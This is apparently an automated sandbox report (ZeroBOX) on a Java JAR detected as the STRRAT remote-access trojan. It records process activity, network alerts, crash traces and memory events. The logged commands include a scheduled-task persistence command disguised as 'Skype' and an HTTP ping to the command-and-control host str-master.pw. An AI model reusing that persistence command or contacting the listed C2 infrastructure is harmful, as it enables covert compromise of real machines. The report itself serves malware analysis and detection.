Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 19, 2021, 9:18 a.m.	Oct. 19, 2021, 9:49 a.m.

Size	102.5KB
Type	Java archive data (JAR)
MD5	`b2097471ac7d4e8304a119e815ac5261`
SHA256	`c4acaaf51b789c246dc51d925ee92f8e0af9019da7385b8b4b127fca43fbb81d`
CRC32	`22A962A3`
ssdeep	`1536:ddAewzYpcmCIE7/d8CC9odgo08E1fl3VLIjo1S8mfaEh7FT8VYclwDu2d:zAewzChPWC9oqoENIGS7LNFTPcu6u`
Yara	None matched

java.exe "C:\Program Files (x86)\Java\jre1.8.0_131\bin\java.exe" -jar C:\Users\test22\AppData\Local\Temp\micro.jar
1040
- java.exe "C:\Program Files (x86)\Java\jre1.8.0_131\bin\java.exe" -jar "C:\Users\test22\micro.jar"
  2200
  - cmd.exe cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
    2264
    - schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
      540
  - java.exe "C:\Program Files (x86)\Java\jre1.8.0_131\bin\java.exe" -jar "C:\Users\test22\AppData\Roaming\micro.jar"
    2396

Name	Response	Post-Analysis Lookup
repo1.maven.org	CNAME sonatype.map.fastly.net A 151.101.24.209	199.232.196.209
github-releases.githubusercontent.com	A 185.199.108.154 A 185.199.111.154 A 185.199.109.154 A 185.199.110.154	185.199.108.154
nightwolf.workisboring.com
str-master.pw	A 147.182.174.188	147.182.174.188
github.com	A 52.78.231.108	15.164.81.167

IP Address	Status	Action
147.182.174.188	Active	Moloch
151.101.24.209	Active	Moloch
164.124.101.2	Active	Moloch
173.209.48.226	Active	Moloch
185.199.109.154	Active	Moloch
52.78.231.108	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49165 -> 151.101.24.209:443	2028375	ET JA3 Hash - Possible Malware - Java Based RAT	Unknown Traffic
TCP 192.168.56.102:49164 -> 52.78.231.108:443	2028375	ET JA3 Hash - Possible Malware - Java Based RAT	Unknown Traffic
TCP 192.168.56.102:49166 -> 151.101.24.209:443	2028375	ET JA3 Hash - Possible Malware - Java Based RAT	Unknown Traffic
TCP 192.168.56.102:49167 -> 151.101.24.209:443	2028375	ET JA3 Hash - Possible Malware - Java Based RAT	Unknown Traffic
TCP 192.168.56.102:49168 -> 185.199.109.154:443	2028375	ET JA3 Hash - Possible Malware - Java Based RAT	Unknown Traffic
UDP 192.168.56.102:64472 -> 164.124.101.2:53	2016778	ET DNS Query to a *.pw domain - Likely Hostile	Potentially Bad Traffic
UDP 192.168.56.102:54322 -> 164.124.101.2:53	2028756	ET POLICY DNS Query to DynDNS Domain *.workisboring .com	Potentially Bad Traffic
TCP 192.168.56.102:49180 -> 147.182.174.188:80	2030359	ET MALWARE STRRAT Initial HTTP Activity	Malware Command and Control Activity Detected
TCP 192.168.56.102:49180 -> 147.182.174.188:80	2016777	ET INFO HTTP Request to a *.pw domain	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49165 151.101.24.209:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA H2 2021	CN=repo1.maven.org	e2:ba:c2:7f:d9:98:22:e2:6b:cb:17:2c:c0:15:62:76:df:a3:21:b0
TLS 1.2 192.168.56.102:49164 52.78.231.108:443	C=US, O=DigiCert, Inc., CN=DigiCert High Assurance TLS Hybrid ECC SHA256 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com	84:63:b3:a9:29:12:cc:fd:1d:31:47:05:98:9b:ec:13:99:37:d0:d7
TLS 1.2 192.168.56.102:49166 151.101.24.209:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA H2 2021	CN=repo1.maven.org	e2:ba:c2:7f:d9:98:22:e2:6b:cb:17:2c:c0:15:62:76:df:a3:21:b0
TLS 1.2 192.168.56.102:49167 151.101.24.209:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA H2 2021	CN=repo1.maven.org	e2:ba:c2:7f:d9:98:22:e2:6b:cb:17:2c:c0:15:62:76:df:a3:21:b0
TLS 1.2 192.168.56.102:49168 185.199.109.154:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=www.github.com	70:94:de:dd:e6:c4:69:48:3a:92:70:a1:48:56:78:2d:18:64:e0:b7

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 19, 2021, 9:19 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleA Oct. 19, 2021, 9:18 a.m.	buffer: ################################################ # # # ## # # ## ### ### ## ### # # # # # # # # # # # # # # # # ### # # ### # # # ## # # # # # ### ### # # # ### # # ### # # # # Obfuscation by Allatori Obfuscator v7.3 DEMO # # # # http://www.allatori.com # # # ################################################ console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2021, 9:18 a.m.	buffer: Starting Download console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2021, 9:19 a.m.	buffer: Waiting for dependency console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 19, 2021, 9:18 a.m.		1	1	0

One or more processes crashed (7 events)

Time & API	Arguments	Status
__exception__ Oct. 19, 2021, 9:18 a.m.	stacktrace: exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e exception.instruction: mov eax, dword ptr [esi] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x2750202 registers.esp: 4323896 registers.edi: 1 registers.eax: 6 registers.ebp: 1937757376 registers.edx: 0 registers.ebx: 133120 registers.esi: 0 registers.ecx: 3405691582	1
__exception__ Oct. 19, 2021, 9:19 a.m.	stacktrace: 0x2898d28 0x27544e0 0x27544e0 0x27544e0 0x27544e0 0x27544e0 0x2754854 0x2754854 0x2754854 0x289b5e4 0x27544e0 0x27544e0 0x27544e0 0x289b584 0x2754854 0x2754889 0x2750697 JVM_GetThreadStateNames+0x4d395 _JVM_EnqueueOperation@20-0x6191b jvm+0x15af45 @ 0x735caf45 _JVM_FindSignal@4+0x6402e ??_7DCmdFactory@@6B@-0xa2d06 jvm+0x2213ae @ 0x736913ae JVM_GetThreadStateNames+0x4d42e _JVM_EnqueueOperation@20-0x61882 jvm+0x15afde @ 0x735cafde JVM_GetThreadStateNames+0x4d5b6 _JVM_EnqueueOperation@20-0x616fa jvm+0x15b166 @ 0x735cb166 JVM_GetThreadStateNames+0x4d627 _JVM_EnqueueOperation@20-0x61689 jvm+0x15b1d7 @ 0x735cb1d7 jio_printf+0x9f _JVM_StartThread@8-0x11 jvm+0xff36f @ 0x7356f36f JVM_GetThreadStateNames+0x70080 _JVM_EnqueueOperation@20-0x3ec30 jvm+0x17dc30 @ 0x735edc30 JVM_GetThreadStateNames+0x708fa _JVM_EnqueueOperation@20-0x3e3b6 jvm+0x17e4aa @ 0x735ee4aa _JVM_FindSignal@4+0x5b46 ??_7DCmdFactory@@6B@-0x1011ee jvm+0x1c2ec6 @ 0x73632ec6 _endthreadex+0x3a _beginthreadex-0xab msvcr100+0x5c556 @ 0x73f9c556 _endthreadex+0xe4 _beginthreadex-0x1 msvcr100+0x5c600 @ 0x73f9c600 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 85 05 00 01 46 00 8b 74 24 1c 3b d6 7c bb 8b c7 exception.instruction: test eax, dword ptr [0x460100] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x288e277 registers.esp: 369094832 registers.edi: 254 registers.eax: 79997864 registers.ebp: 369095068 registers.edx: 12985 registers.ebx: 0 registers.esi: 254 registers.ecx: 0	1
__exception__ Oct. 19, 2021, 9:19 a.m.	stacktrace: 0x2898d28 0x27544e0 0x27544e0 0x27544e0 0x27544e0 0x27544e0 0x2754854 0x2754854 0x2754854 0x289b5e4 0x27544e0 0x27544e0 0x27544e0 0x289b584 0x2754854 0x2754889 0x2750697 JVM_GetThreadStateNames+0x4d395 _JVM_EnqueueOperation@20-0x6191b jvm+0x15af45 @ 0x735caf45 _JVM_FindSignal@4+0x6402e ??_7DCmdFactory@@6B@-0xa2d06 jvm+0x2213ae @ 0x736913ae JVM_GetThreadStateNames+0x4d42e _JVM_EnqueueOperation@20-0x61882 jvm+0x15afde @ 0x735cafde JVM_GetThreadStateNames+0x4d5b6 _JVM_EnqueueOperation@20-0x616fa jvm+0x15b166 @ 0x735cb166 JVM_GetThreadStateNames+0x4d627 _JVM_EnqueueOperation@20-0x61689 jvm+0x15b1d7 @ 0x735cb1d7 jio_printf+0x9f _JVM_StartThread@8-0x11 jvm+0xff36f @ 0x7356f36f JVM_GetThreadStateNames+0x70080 _JVM_EnqueueOperation@20-0x3ec30 jvm+0x17dc30 @ 0x735edc30 JVM_GetThreadStateNames+0x708fa _JVM_EnqueueOperation@20-0x3e3b6 jvm+0x17e4aa @ 0x735ee4aa _JVM_FindSignal@4+0x5b46 ??_7DCmdFactory@@6B@-0x1011ee jvm+0x1c2ec6 @ 0x73632ec6 _endthreadex+0x3a _beginthreadex-0xab msvcr100+0x5c556 @ 0x73f9c556 _endthreadex+0xe4 _beginthreadex-0x1 msvcr100+0x5c600 @ 0x73f9c600 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 85 05 00 01 46 00 8b ca 89 7c 24 70 89 5c 24 74 exception.instruction: test eax, dword ptr [0x460100] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x2886e4d registers.esp: 367848576 registers.edi: 2431113872 registers.eax: 4 registers.ebp: 367848988 registers.edx: 3192073229 registers.ebx: 1411854156 registers.esi: 3844164496 registers.ecx: 1	1
__exception__ Oct. 19, 2021, 9:19 a.m.	stacktrace: exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e exception.instruction: mov eax, dword ptr [esi] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x25e0202 registers.esp: 14808788 registers.edi: 1 registers.eax: 6 registers.ebp: 1935594688 registers.edx: 0 registers.ebx: 133120 registers.esi: 0 registers.ecx: 3405691582	1
__exception__ Oct. 19, 2021, 9:19 a.m.	stacktrace: 0x26f3778 0x25e4854 0x25e0697 JVM_GetThreadStateNames+0x4d395 _JVM_EnqueueOperation@20-0x6191b jvm+0x15af45 @ 0x733baf45 _JVM_FindSignal@4+0x6402e ??_7DCmdFactory@@6B@-0xa2d06 jvm+0x2213ae @ 0x734813ae JVM_GetThreadStateNames+0x4d42e _JVM_EnqueueOperation@20-0x61882 jvm+0x15afde @ 0x733bafde JNI_GetCreatedJavaVMs+0x6f27 JNI_CreateJavaVM-0xa4f9 jvm+0xdcb97 @ 0x7333cb97 JNI_GetCreatedJavaVMs+0xf4bf JNI_CreateJavaVM-0x1f61 jvm+0xe512f @ 0x7334512f java+0x229e @ 0xe9229e java+0xae9f @ 0xe9ae9f java+0xaf29 @ 0xe9af29 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 89 0c 0d 00 00 d9 00 81 3d 88 82 5e 73 00 00 00 exception.instruction: mov dword ptr [ecx + 0xd90000], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x26f3597 registers.esp: 14809080 registers.edi: 14466048 registers.eax: 14800816 registers.ebp: 14809096 registers.edx: 2130553844 registers.ebx: 0 registers.esi: 0 registers.ecx: 1920	1
__exception__ Oct. 19, 2021, 9:19 a.m.	stacktrace: exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e exception.instruction: mov eax, dword ptr [esi] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x2780202 registers.esp: 38074488 registers.edi: 1 registers.eax: 6 registers.ebp: 1931596992 registers.edx: 0 registers.ebx: 16910336 registers.esi: 0 registers.ecx: 3405691582	1
__exception__ Oct. 19, 2021, 9:19 a.m.	stacktrace: _JVM_SetVmMemoryPressure@4-0x128cd jvm+0x7273 @ 0x72e97273 _JVM_SetVmMemoryPressure@4-0x127dc jvm+0x7364 @ 0x72e97364 _JVM_GetManagementExt@4+0x51a4 AsyncGetCallTrace-0xb52bc jvm+0x206a4 @ 0x72eb06a4 _JVM_FindSignal@4+0xcc8c0 ??_7DCmdFactory@@6B@-0x3a474 jvm+0x289c40 @ 0x73119c40 _JVM_FindSignal@4+0xcd4d4 ??_7DCmdFactory@@6B@-0x39860 jvm+0x28a854 @ 0x7311a854 _JVM_FindSignal@4+0xcd628 ??_7DCmdFactory@@6B@-0x3970c jvm+0x28a9a8 @ 0x7311a9a8 _JVM_FindSignal@4+0xcd8a2 ??_7DCmdFactory@@6B@-0x39492 jvm+0x28ac22 @ 0x7311ac22 _JVM_GetManagementExt@4+0x5519a AsyncGetCallTrace-0x652c6 jvm+0x7069a @ 0x72f0069a _JVM_GetManagementExt@4+0x5594f AsyncGetCallTrace-0x64b11 jvm+0x70e4f @ 0x72f00e4f JVM_GetThreadStateNames+0x70080 _JVM_EnqueueOperation@20-0x3ec30 jvm+0x17dc30 @ 0x7300dc30 JVM_GetThreadStateNames+0x708fa _JVM_EnqueueOperation@20-0x3e3b6 jvm+0x17e4aa @ 0x7300e4aa _JVM_FindSignal@4+0x5b46 ??_7DCmdFactory@@6B@-0x1011ee jvm+0x1c2ec6 @ 0x73052ec6 _endthreadex+0x3a _beginthreadex-0xab msvcr100+0x5c556 @ 0x74b7c556 _endthreadex+0xe4 _beginthreadex-0x1 msvcr100+0x5c600 @ 0x74b7c600 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c7 04 08 01 00 00 00 5d c3 cc cc 83 3d 68 80 21 exception.instruction: mov dword ptr [eax + ecx], 1 exception.exception_code: 0xc0000005 exception.symbol: _JVM_SetVmMemoryPressure@4-0x1293b jvm+0x7205 exception.address: 0x72e97205 registers.esp: 367391736 registers.edi: 14568544 registers.eax: 1408 registers.ebp: 367391736 registers.edx: 14940312 registers.ebx: 14625792 registers.esi: 14625792 registers.ecx: 8650752	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET http://str-master.pw/strigoi/server/ping.php?lid=EX1S-4U37-B1T8-TB2H-0ITG

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

str-master.pw

description

Palau domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 103 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 163840 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02750000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02778000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02788000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02798000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02800000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02808000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02818000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02828000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02838000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02848000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02858000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02868000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02878000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02888000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02898000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 163840 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02608000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02610000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02618000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02620000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02628000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02638000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02640000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02648000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:19 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 32768 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02650000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna2477946155262815302.dll
